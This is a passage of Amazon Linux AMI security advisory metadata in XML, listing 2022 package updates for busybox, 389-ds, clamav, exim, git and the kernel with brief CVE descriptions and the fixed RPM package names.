status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1608</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1608: medium priority package update for busybox</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28391:
An escape sequence injection attack was found in BusyBox on Alpine. For this issue to occur, a remote host's virtual terminal must contain an escape sequence, and the victim must then execute netstat. This flaw allows an attacker can inject arbitrary code, leading to a loss of integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391" title="" id="CVE-2022-28391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox-petitboot" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.14.amzn1.i686.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.14.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1619</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1619: low priority package update for 389-admin</title><issued date="2022-07-28 20:30:00" /><updated date="2022-08-04 22:38:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3652:
A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successf
ully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3652" title="" id="CVE-2021-3652" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-admin" version="1.1.46" release="5.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-admin-1.1.46-5.14.amzn1.x86_64.rpm</filename></package><package name="389-admin-debuginfo" version="1.1.46" release="5.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-admin-debuginfo-1.1.46-5.14.amzn1.x86_64.rpm</filename></package><package name="389-admin-debuginfo" version="1.1.46" release="5.14.amzn1" epoch="0" arch="i686"><filename>Packages/389-admin-debuginfo-1.1.46-5.14.amzn1.i686.rpm</filename></package><package name="389-admin" version="1.1.46" release="5.14.amzn1" epoch="0" arch="i686"><filename>Packages/389-admin-1.1.46-5.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1620</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1620: low priority package update for 389-ds-base</title><issued date="2022-07-28 20:31:00" /><updated date="2022-08-04 22:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3652:
A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successf
ully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3652" title="" id="CVE-2021-3652" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.10.2-9.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1621</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1621: important priority package update for clamav</title><issued date="2022-07-28 20:34:00" /><updated date="2022-08-04 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-20796:
On May 4, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in Clam AntiVirus (ClamAV) versions 0.103.4, 0.103.5, 0.104.1, and 0.104.2 could allow an authenticated, local attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog.
CVE-2022-20785:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in HTML file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
CVE-2022-20771:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in the TIFF file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
CVE-2022-20770:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in CHM file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20770" title="" id="CVE-2022-20770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20771" title="" id="CVE-2022-20771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20785" title="" id="CVE-2022-20785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20796" title="" id="CVE-2022-20796" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.6" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.103.6-1.49.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.103.6" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.6-1.49.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.6-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1622</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1622: critical priority package update for exim</title><issued date="2022-07-28 20:35:00" /><updated date="2022-08-04 22:42:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27216:
Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.
CVE-2020-28026:
Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.
CVE-2020-28025:
Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.
CVE-2020-28024:
Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF.
CVE-2020-28023:
Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.
CVE-2020-28022:
Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.
CVE-2020-28019:
Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.
CVE-2020-28014:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.
CVE-2020-28013:
Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles "-F '.('" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy.
CVE-2020-28012:
Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.
CVE-2020-28011:
Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root.
CVE-2020-28010:
Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).
CVE-2020-28009:
Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).
CVE-2020-28008:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.
CVE-2020-28007:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28007" title="" id="CVE-2020-28007" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28008" title="" id="CVE-2020-28008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28009" title="" id="CVE-2020-28009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28010" title="" id="CVE-2020-28010" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28011" title="" id="CVE-2020-28011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28012" title="" id="CVE-2020-28012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28013" title="" id="CVE-2020-28013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28014" title="" id="CVE-2020-28014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28019" title="" id="CVE-2020-28019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28022" title="" id="CVE-2020-28022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28023" title="" id="CVE-2020-28023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28024" title="" id="CVE-2020-28024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28025" title="" id="CVE-2020-28025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28026" title="" id="CVE-2020-28026" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27216" title="" id="CVE-2021-27216" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1623</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1623: medium priority package update for git</title><issued date="2022-07-28 20:36:00" /><updated date="2022-08-04 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29187:
A vulnerability was found in Git. This flaw occurs due to Git not checking the ownership of directories in a local multi-user system when running commands specified in the local repository configuration. This issue allows the owner of the repository to cause arbitrary commands to be executed by other users who access the repository.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29187" title="" id="CVE-2022-29187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-hg" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-core" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.37.1-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1624</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1624: important priority package update for kernel</title><issued date="2022-07-28 20:37:00" /><updated date="2022-08-04 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-33744:
Arm guests can cause Dom0 DoS via PV devices When mapping pages of guests on Arm, dom0 is using an rbtree to keep track of the foreign mappings. Updating of that rbtree is not always done completely with the related lock held, resulting in a small race window, which can be used by unprivileged guests via PV devices to cause inconsistencies of the rbtree. These inconsistencies can lead to Denial of Service (DoS) of dom0, e.g. by causing crashes or the inability to perform further mappings of other guests' memory pages.
CVE-2022-33742:
Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).
CVE-2022-33741:
Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).
CVE-2022-33740:
Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).
CVE-2022-26365:
Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).
CVE-2022-2318:
There are use-after-free vulnerabilities caused by timer handler in net/rose/rose_timer.c of linux that allow attackers to crash linux kernel without any privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2318" title="" id="CVE-2022-2318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26365" title="" id="CVE-2022-26365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33740" title="" id="CVE-2022-33740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33741" title="" id="CVE-2022-33741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33742" title="" id="CVE-2022-33742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33744" title="" id="CVE-2022-33744" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.287" release="148.504.amzn1" epoch="0" 